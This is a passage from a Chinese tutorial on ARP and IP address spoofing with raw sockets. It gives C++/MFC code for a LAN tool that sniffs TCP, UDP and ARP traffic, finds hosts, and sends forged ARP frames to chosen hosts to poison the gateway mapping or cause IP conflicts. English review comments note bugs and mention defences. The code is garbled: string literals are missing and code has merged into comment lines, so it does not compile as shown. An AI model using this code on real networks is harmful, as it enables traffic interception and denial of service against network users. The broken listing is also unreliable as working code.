原始套接字透析之实现IP地址欺骗(4)

2019-08-31 17:12

switch (ip->proto) {

case IPPROTO_TCP:

TCP_HEADER *pTcpHeader;

pTcpHeader = (TCP_HEADER*)(pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4);

packetList[currentPktIndex].srcPort = ntohs(pTcpHeader->th_sport); packetList[currentPktIndex].desPort = ntohs(pTcpHeader->th_dport);

memcpy(packetList[currentPktIndex].data, pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4+20, 255);

packetList[currentPktIndex].data[255] = 0; break;

case IPPROTO_UDP:

UDP_HEADER *pUdpHeader;

pUdpHeader = (UDP_HEADER*)(pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4);

packetList[currentPktIndex].srcPort = ntohs(pUdpHeader->uh_sport); packetList[currentPktIndex].desPort = ntohs(pUdpHeader->uh_dport); memcpy(packetList[currentPktIndex].data, pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4+sizeof(UDP_HEADER), 256); packetList[currentPktIndex].data[255] = 0; break; default:

packetList[currentPktIndex].data[0] = 0; break; }

currentPktIndex++;

currentPktIndex %= MAX_PACKET; if (currentPktIndex == 0)

mailDlg->PostMessage(RECV_PKT); break; } } continue; }

else if (eth->eh_type == htons(ETH_ARP)) {

if (arp->arp_tpa == htonl(myip) && arp->arp_opt == htons(ARP_REPLY)) { int i;

for (i = 0; i < currentHstIndex; i++) {

if (hostList[i].ip == arp->arp_spa)

{ break; } }

if (i >= currentHstIndex) {

hostList[currentHstIndex].ip = arp->arp_spa;

memcpy(hostList[currentHstIndex].mac, eth->eh_src, 6); currentHstIndex++; } }

else if (arp->arp_spa == htonl(myip) && arp->arp_opt == htons(ARP_REPLY)) memcpy(mmac, eth->eh_src, 6); for (int i = 0; i < oldHstIndex; i++) {

if ((oldHostList[i].ip == arp->arp_spa || oldHostList[i].ip == arp ->arp_tpa) && oldHostList[i].sniffer == 1) {

packetList[currentPktIndex].srcIp = arp->arp_spa; packetList[currentPktIndex].desIp = arp->arp_tpa; packetList[currentPktIndex].protocol = ARP; packetList[currentPktIndex].data[0] = 0;

currentPktIndex++;

currentPktIndex %= MAX_PACKET; if (currentPktIndex == 0)

mailDlg->PostMessage(RECV_PKT); break; } } } } }

我们需要动态追踪局域网内节点的活动状态,以定时器实现:

// Timer handler: polls the CheckHost worker thread, refreshes the host grid,
// emits ARP frames for hosts whose flags are set, then snapshots the host
// table and starts the next CheckHost pass.
//
// NOTE(review): this listing is shown as extracted from the page. Every string
// literal was lost (a stray `\` marks where each one stood) and some code was
// merged onto comment lines, so it does not compile as shown. The comments
// below describe only what the surviving tokens establish.
void CNetHackerDlg::OnTimer(UINT nIDEvent) {

// NOTE(review): the `if (sthread == 0) {` that opens the first-run branch was
// merged onto the wizard comment line below by the extraction.
// TODO: Add your message handler code here and/or call default if (sthread == 0) {

// While mmac is still all zero, send an ARP request and return. The receive
// code earlier in the listing copies eth->eh_src into mmac when it sees an ARP
// reply whose sender address equals myip (presumably this adapter's own MAC).
if (!mmac[0] && !mmac[1] && !mmac[2] && !mmac[3] && !mmac[4] && !mmac[5]) {

SendArpReq(1, myip, mmac); return ;

}

// Start the first CheckHost pass; the timer interval is scaled by the size of
// the address range (toip - fromip). The closing brace of the first-run branch
// sits inside the trailing comment.
sthread = CreateThread(NULL, 0, CheckHost, 0, 0, 0); SetTimer(1, 7 *(toip - fromip), NULL); // start the timer }

// Zero-timeout wait: return immediately unless the CheckHost thread has ended.
if (WaitForSingleObject(sthread, 0) != WAIT_OBJECT_0) { return ; }

//test using self host

/* hostList[currentHstIndex].sniffer = 1; hostList[currentHstIndex].ipConflict = 0; hostList[currentHstIndex].arpCheat = 0; hostList[currentHstIndex].ip = htonl(myip); hostList[currentHstIndex].ipConflict = 1; hostList[currentHstIndex].arpCheat = 1;

memcpy(hostList[currentHstIndex].mac,mmac,6); currentHstIndex++; */ int i, j;

// Carry the per-host flags (sniffer, ipConflict, arpCheat) over from the
// previous snapshot for every IP that is still present.
for (i = 0; i < currentHstIndex; i++) {

for (j = 0; j < oldHstIndex; j++) {

if (oldHostList[j].ip == hostList[i].ip) {

hostList[i].sniffer = oldHostList[j].sniffer; hostList[i].ipConflict = oldHostList[j].ipConflict; hostList[i].arpCheat = oldHostList[j].arpCheat; break; } } }

// Re-arm timer 1 with a fixed 20000 ms interval.
SetTimer(1, 20000, NULL);

// Refresh the visible rows of the grid: i indexes hostList starting at the
// scroll offset (nVWndPos / 13), j is the grid row.
// NOTE(review): j is not bounded here; the clearing loop further down stops at
// 31 rows, so more than 31 hosts past the offset may address rows beyond the
// grid - confirm against the grid control.
for (i = m_hostList.nVWndPos / 13, j = 0; i < currentHstIndex; i++, j++) {

CString str;

m_hostList.SetText(j + 1, 0, inet_ntoa(*(struct in_addr*)(&(hostList[i].ip)) ));

if (hostList[i].sniffer == 0)

m_hostList.SetText(j + 1, 2, \

else

m_hostList.SetText(j + 1, 2, \

str.Format(\ hostList[i].mac[1], hostList[i].mac[2], hostList[i].mac[3], hostList[i].mac[4], hostList[i].mac[5]); m_hostList.SetText(i + 1, 1, str);

// NOTE(review): the MAC column above is written to row i + 1 while every other
// column uses j + 1; the two differ whenever the scroll offset is non-zero.
if (hostList[i].arpCheat == 0)

m_hostList.SetText(j + 1, 3, \ else

m_hostList.SetText(j + 1, 3, \ if (hostList[i].ipConflict == 0)

m_hostList.SetText(j + 1, 4, \ else

m_hostList.SetText(j + 1, 4, \}

// Overwrite all five columns of the remaining rows up to row 31 (the literal
// written there was lost in extraction).
for (; j < 31; j++) {

for (int k = 0; k < 5; k++) m_hostList.SetText(j + 1, k, \}

m_hostList.Invalidate();

// Sender MAC used for the frames below: bytes 0-3 come from mmac, byte 5 from
// rand().
// NOTE(review): mac[4] is never assigned, so an indeterminate stack byte goes
// out on the wire. Because the first four bytes match the value held in mmac,
// the frames stay attributable to that adapter's address prefix when captured.
unsigned char mac[6]; memcpy(mac, mmac, 4); mac[5] = rand();

// For each flagged host, reverse the byte order of its stored IP and call
// SendArpReq (not shown in this listing; the original comment labels the first
// call "gateway -> spoofed IP").
// NOTE(review): on a monitored segment this presumably appears as ARP traffic
// binding an in-use IP to a MAC that does not own it. ARP-binding monitoring,
// Dynamic ARP Inspection on the switch, or a static gateway entry are the usual
// controls - confirm SendArpReq's parameter meaning before relying on this.
for (i = 0; i < currentHstIndex; i++) {

unsigned long ip;

if (hostList[i].arpCheat == 1) {

ip = (hostList[i].ip &0xff) << 24; ip += (hostList[i].ip &0xff00) << 8; ip += (hostList[i].ip &0xff0000) >> 8; ip += (hostList[i].ip &0xff000000) >> 24; SendArpReq(gateip, ip, mac); // gateway -> spoofed IP }

if (hostList[i].ipConflict == 1) {

ip = (hostList[i].ip &0xff) << 24; ip += (hostList[i].ip &0xff00) << 8; ip += (hostList[i].ip &0xff0000) >> 8; ip += (hostList[i].ip &0xff000000) >> 24;

SendArpReq(ip, 2, mac); } }

// Snapshot the whole host table (all MAX_HOST entries) and reset the live count
// so the next pass rebuilds hostList from scratch.
// NOTE(review): the receive code earlier in the listing also writes hostList
// and currentHstIndex; no lock is visible here, so if that code runs on another
// thread this copy and reset can race with it - confirm.
memcpy(oldHostList, hostList, sizeof(HostList) *MAX_HOST); oldHstIndex = currentHstIndex; currentHstIndex = 0;

OnRecvPkt();

// Start the next CheckHost pass.
// NOTE(review): sthread is overwritten and no CloseHandle on the previous
// handle is visible in this function, so one thread handle appears to leak per
// completed pass.
sthread = CreateThread(NULL, 0, CheckHost, 0, 0, 0); CDialog::OnTimer(nIDEvent); }

Sniffer到需要监听节点的报文后,sniffer线程会主动给对话框发送消息,以更新显示:

void CNetHackerDlg::OnRecvPkt() {

CString str;

for (int i = 1; i <= MAX_PACKET; i++) {

if (!packetList[i - 1].srcIp) break;

m_packetList.SetText(i, 0, inet_ntoa(*(struct in_addr*)(&(packetList[i - 1].srcIp))));

m_packetList.SetText(i, 1, inet_ntoa(*(struct in_addr*)(&(packetList[i - 1].desIp))));

switch (packetList[i - 1].protocol) {

case IPPROTO_TCP:

m_packetList.SetText(i, 2, \ str.Format(\ m_packetList.SetText(i, 3, str);

str.Format(\ m_packetList.SetText(i, 4, str); break;

case IPPROTO_UDP:

m_packetList.SetText(i, 2, \ str.Format(\ m_packetList.SetText(i, 3, str);

str.Format(\ m_packetList.SetText(i, 4, str);

